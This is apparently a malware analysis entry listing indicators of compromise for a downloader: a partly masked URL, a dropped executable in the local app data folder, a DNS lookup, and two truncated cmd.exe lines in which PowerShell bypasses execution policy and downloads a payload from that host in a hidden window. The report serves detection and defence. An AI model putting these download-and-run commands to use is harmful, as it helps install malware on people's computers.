Technical Information
- http://co#.###homemadecook.com/dnoces/tpmetta/eztrxytcfvgubhki.php as %localappdata%\tempefgjasd.exe
- %LOCALAPPDATA%\tempefgjasd.exe
- http://co#.###homemadecook.com/dnoces/tpmetta/eztrxytcfvgubhki.php
- DNS ASK co#.###homemadecook.com
- '<SYSTEM32>\cmd.exe' /c PowerShell -NoExit -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://co#.###homemadecook.com/dnoces/tpmetta/eztrxytcfvgubhki.php','%LOCALAPPDATA%\Temp...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c PowerShell -NoExit -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://co#.###homemadecook.com/dnoces/tpmetta/eztrxytcfvgubhki.php','%LOCALAPPDATA%\Temp...